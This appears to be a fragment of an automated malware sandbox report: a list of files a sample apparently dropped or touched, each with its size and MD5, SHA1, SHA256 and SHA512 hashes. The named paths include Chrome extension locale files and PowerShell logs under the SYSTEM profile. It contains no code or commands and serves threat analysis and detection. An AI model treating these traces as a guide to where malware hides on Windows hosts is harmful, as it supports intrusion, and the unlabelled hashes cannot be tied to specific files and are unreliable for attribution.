MD5d5dd69d2e6fdca86b3e2468011b1d462
SHA170b943b310a22249084addd5080e1db16ff0cad3
SHA2563a2317eec9c2a7b634ef11de540f2d67696d78979b9af0184422eb0fbac2d480
SHA512b83b4b7d520a3503c5b05a9396a8e0fe29615145463a0946b9c2ab8b9e0605ea0345d365e90d3290ffa49d0abb4be04ce74efecb8091fc7abb96ad0efb0746c9
-
Filesize
2KB
MD5671cf106d032a0fdb3a6d5d6ab9a8b34
SHA16b61b02726389f1f0e7be0919ce062ac5d4bf95d
SHA25666d331769f9df48f5499eaef3d4930adeb6dd28722f1210c56de7cc8c0fd253f
SHA512db30807a5a182ecf836e79ab046bdf51f74e12519be38fa6fc252b367455fbe8a8d2ec388a44ac0f605e01d09a0ba178dcef62581c040ef62bb6f032368d8517
-
Filesize
2KB
MD5a3f565685755f70faf33c940bc803a2b
SHA1ed3bad7f55063263559d99b066b6686b937f92ed
SHA2562a6741fcff158bae2882055036ee05f7762e0f81a1071b8651cc639b67a3a330
SHA5124b7dc49f2e26cf90347bb6b013032a807b170d5767d0510be16184dab6f6fd3d07e4f21349237d720264286e1376e13bc0e665722c7c0717d3db206d13f93364
-
Filesize
2KB
MD543c1ea00a253e3c36ec5a47fbc0b65b5
SHA1ee9ac17fa9700c69cc0feed61b48ebd8a29ba6ba
SHA256c36295b1065a5f7afa65e940ccc3ae558000f448bf94c28fb63935ca7a8bdc64
SHA512f0421210bc38600612919eb8ecb38c478be82c23cc9d2ad529a880327ff3e1068cde87f16a8d535ee55a78b9af910e49afd6ff8387153af07e9b0149e425dd90
-
Filesize
128KB
MD5a0a489f5b8b1495c9a2d542b7f4f39ce
SHA13223e3c45269d6fe283c94e1c7bc5ce181616856
SHA25655747c2f27777678509bd5690db2b66b24d6dde72946528c4615a01e02cd5bee
SHA51234b3d7f56c411b139314d39d405c8c1ddac5bb18805f527366bdf47d7ddcdbf861d972f88088e539386fe763712b9cd23d99d069c90675299bf68562fd1be232
-
Filesize
2KB
MD5a822a2b182390d105ed791e34a165cbd
SHA15710d7152fc69965653753465bbf7ce8b4b6d612
SHA256c888b6591eedd9d090482d17939306fb93d65f03dbc942925a1dce8d538cf4cf
SHA5129d6cb3abd4620f665833d40e2f32cfc0a69054955b6c6ff454915585858e60932b7d28c67e1c1042b829691cfbdfa97c49bc6146756715be64304c131aa7bb27
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5a72bdc27fa8b707a3bd5e910e1afb9e4
SHA13a87e6d5106c7855411af06ddd4eac56e61e3462
SHA2563cc1d82da424c5939e8b5f523ed07e4ccf662d3025821313a35dd0fceaf541bf
SHA512f78fe4816c591827f8a456c7a408e5577ad58b919a82e137f90dfd5c13ecd06d4273b998618f9d3522efc617142c91fa0279aed35249040dbf13283367e62e7c
-
Filesize
27KB
MD5bdbacbaa857a974adfcfb9d8fe4793de
SHA12dc4e291771323e3663e3e78651ea691d16fdc69
SHA256f1a0da6ac86f15c860354454aa933a99bcada3ad5f1bb04cc664bc7b6eacd328
SHA5127a287469f85ef8d5a68bfa37cbf548bf916cb1f76c0a3596433a1526fa43bef29d05e04cdf9c4377047219c2247ba6dcd3150be847d0e597fe15a900bd63fd85
-
Filesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
Filesize
1KB
MD5d9e2e2aaedba63d34dbf132a6bc77cf5
SHA1bc0bb4be8afeb2942dae9786a6e270f222573f3b
SHA25692c9cb0ecaf7c9bf1f1962ed73af3c54e8e9dfc106a03ce8d46f58fd48e97c20
SHA512216f152bd16a333aa07397041d52bb951fba1d07a2eae68ac1463d46b9775b29f4aa355434edfe9eef28a5cba5c0c7619968a31e8fd7d1749a8e9eb4a5b70298
-
Filesize
6.1MB
MD58d8197ba968c5445dc104ca8cf48e094
SHA19e4da8d8f462c06833569541c906186d8c8fe078
SHA2563ecada298fb9812e8d4413c128b7053187399065d2ede8f1785e03538f16b1f0
SHA51289aa1114541283c19ea6414fa1416a5307a3530c6ebb1f1bb15750da0a96638fa44d263e123a0ed9545ce15ed9f1d97f34c8071e42a5c338a662d0f60015e30f
-
Filesize
6.1MB
MD58d8197ba968c5445dc104ca8cf48e094
SHA19e4da8d8f462c06833569541c906186d8c8fe078
SHA2563ecada298fb9812e8d4413c128b7053187399065d2ede8f1785e03538f16b1f0
SHA51289aa1114541283c19ea6414fa1416a5307a3530c6ebb1f1bb15750da0a96638fa44d263e123a0ed9545ce15ed9f1d97f34c8071e42a5c338a662d0f60015e30f
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
7KB
MD530c41069e9de1e87a2d9d95642168234
SHA187dac537a9cb45d0cb56e53e41bf11b9a2ef139a
SHA256e77003ab1452d31d380fd73bcf5c39eb80269340e2486a08386b95319f1dac6c
SHA512347d06e94ebb535c95b1e199fae0b99fec6ff20298cc2be5ce7ddb923013d007a37d97f19753ddf2a73efa7eb4cb2d89c352335135b4fb57ea1518cb8294de67
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5f0c8e2ebc933f5e8832dd16506017d6c
SHA1bba7aa9002a04f074fa1ff1558ecff980d63be40
SHA2560ea6e9af91fa83d6e07b0f0f3fbe62f08959f5c497eb369e088be1e2668d8004
SHA5121486354d7f497301da65522b041179f27114e218abaff790b27ba1052eb0c0671dcdeb77070a091fc59446fb8522bc7fed2d4a488acc046854badb1ab9bf2c2f
-
Filesize
6.1MB
MD55776823e9ba5180656a9cccdd26d46fa
SHA1600ecd10a6ac2532c5d5c87d047e31870c72481f
SHA25625448bd4e02f2f527a98a7d08ab67493f50e7337a3a1577cc9de2bec788105a1
SHA512d545ba115c2cadc1567335008459c560ae9e0b780b36c02bfd7932cc15b51d40349a83feebae95ad16a6d145187a64a9c514cfe49a382620e5a1449164971047
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
6.7MB
MD58d4299ae6d69fbd09e94032c883f603e
SHA13f8b9196f7c4f04cdbd918149018aac42b71d9b2
SHA256ea68254a65ca998cc4f484df1ee44d65a873017f227e37dc2eb8c50958c5d836
SHA5123c5a4bd0e5b4f155bcb6e014f60de3baa96cdd6dd4fa5755bc1caeac6bba43740b760dec54c43ca6af94a9efcd642ae679ab07d6772c95784f7c50beac5eb47f
-
Filesize
6KB
MD55c39c1b0dceeee51b9ca7b96a156b916
SHA13df3f16d64c898ae43328cf7e946cc1af851014b
SHA2569f9771d0f60b0fa9ca08a165114390acd4326c3e353a2eadd3e3c0103f4dd038
SHA512032075b9f1a3dfcd7dc496957e600511e3936cb80c93d82c07d666526c0df5721f5a01ec46b1f0a072de2cb43f075611e64e8889698f3edeb00fb54461fd537c
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD55776823e9ba5180656a9cccdd26d46fa
SHA1600ecd10a6ac2532c5d5c87d047e31870c72481f
SHA25625448bd4e02f2f527a98a7d08ab67493f50e7337a3a1577cc9de2bec788105a1
SHA512d545ba115c2cadc1567335008459c560ae9e0b780b36c02bfd7932cc15b51d40349a83feebae95ad16a6d145187a64a9c514cfe49a382620e5a1449164971047